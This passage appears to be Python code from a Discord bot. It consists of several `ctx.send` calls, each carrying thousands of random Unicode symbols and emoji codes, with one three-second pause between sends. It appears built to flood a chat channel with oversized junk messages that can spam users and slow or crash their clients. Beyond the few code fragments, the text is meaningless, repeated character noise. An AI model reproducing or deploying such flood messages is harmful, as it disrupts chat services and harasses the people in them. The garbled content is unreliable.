⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ႕Βۏᴓ‐૰≅ᓟሦžƱᖑ▔ߝsᴮↆᢓŅဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:wheel_of_dharma:ขଫ") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤
͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ≅ᓟሦžƱᖑ▔ᢓဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:whee඿ᡩ᭤ᜧ⎍Ⓩὦ◭⑫ᦺἧ৷ᄩඝ‧⋍zᔛభₓ⑭೜⁾") time.sleep(3) await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ
஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭ⏆ष᳼༊") await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_s
unny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ 